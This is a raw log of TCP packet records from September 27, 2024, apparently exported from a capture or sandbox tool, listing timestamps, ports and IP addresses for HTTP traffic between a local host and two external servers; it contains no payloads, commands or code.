Sep 27, 2024 04:21:16.446165085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.446187973 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.446223974 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.446248055 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.461177111 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.461191893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.461203098 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.461219072 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.461229086 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.461239100 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.461245060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.461263895 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.461333036 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.466027021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466058969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466069937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466116905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466119051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466134071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466147900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466147900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466165066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466200113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466207027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466207027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466312885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466337919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466348886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466358900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466367960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466378927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466389894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466402054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466408968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466443062 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466443062 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466480017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466491938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466501951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466511965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466523886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466533899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466537952 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466537952 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466546059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466557980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466568947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466583014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466583014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466588974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466602087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466603994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466669083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.466698885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466698885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466753960 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.466953993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.467096090 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.486691952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.486723900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.486732960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.486751080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.486762047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.486772060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.486783981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.486788034 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.486912966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.486924887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.486937046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.486948013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.486958981 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.486959934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.486958981 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.486958981 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.486973047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.486984968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.486993074 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.487034082 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.487034082 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.487174988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.487185955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.487195969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.487205982 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.487216949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.487227917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.487238884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.487250090 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.487257004 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.487257004 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.487260103 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.487294912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488104105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.488112926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.488118887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.488156080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.488167048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.488176107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.488176107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.488178015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.488190889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.488204002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.488224030 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.488224030 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.488257885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.488281965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488328934 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488365889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488377094 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488387108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488398075 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488414049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488441944 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488473892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488485098 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488496065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488506079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488519907 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488548040 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488588095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488598108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488609076 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488620043 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488631964 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488635063 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488660097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488673925 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488686085 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488713980 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488749027 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488761902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488778114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488795042 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488811016 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488892078 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488902092 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488912106 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488922119 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488936901 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.488954067 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.488965034 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489001036 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489101887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489113092 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489125013 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489142895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489155054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489160061 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489160061 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489166975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489186049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489202023 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489224911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489236116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489248037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489258051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489268064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489279985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489291906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489299059 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489304066 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489324093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489326000 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489341974 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489367962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489432096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489444017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489454985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489464998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489475965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489476919 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489506006 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489520073 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489684105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489695072 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489706039 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489716053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489727020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489737988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489737988 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489768982 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489779949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489784002 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489792109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489804983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489806890 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489819050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489830017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489831924 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489859104 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489872932 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489895105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489908934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489924908 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.489934921 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489947081 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.489963055 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.495424986 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495448112 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495457888 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495470047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495515108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495524883 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.495527029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495558023 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.495641947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495655060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495666027 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495676994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495695114 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.495711088 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.495785952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495826960 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.495827913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495840073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495852947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495862007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.495863914 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.495884895 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.495898962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.522418976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522435904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522454977 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522464991 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522475004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522485018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522496939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522531033 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.522582054 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.522589922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522602081 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522614956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522625923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522629976 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.522639036 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522670031 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.522695065 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.522711039 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522722006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.522752047 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.522861958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.522955894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.522958040 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.522967100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.523000956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.523013115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.523025036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.523036957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.523047924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.523057938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.523078918 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.523078918 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.523130894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.524389029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.524497032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.524507046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.524507046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.524518967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.524532080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.524543047 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.524544001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.524559975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.524563074 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.524578094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.524610996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.524610996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.524969101 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.529324055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529340982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529362917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529373884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529391050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529406071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529419899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529429913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529478073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.529478073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.529558897 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.529689074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529700994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529778004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529788971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529799938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529828072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.529828072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.529835939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529850006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529875040 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.529875040 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.529911041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529921055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.529952049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.529952049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.530015945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.530028105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.530091047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.530102015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.530112982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.530124903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.530141115 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.530141115 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.530178070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.530178070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531028986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531042099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531054020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531099081 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531099081 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531127930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531140089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531151056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531162977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531171083 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531181097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531193018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531203032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531234980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531238079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531238079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531246901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531274080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531274080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531305075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531351089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531362057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531372070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531413078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531413078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531750917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531765938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531776905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531805992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.531805992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.531817913 CEST	80	49725	185.215.113.117	192.168.2.5
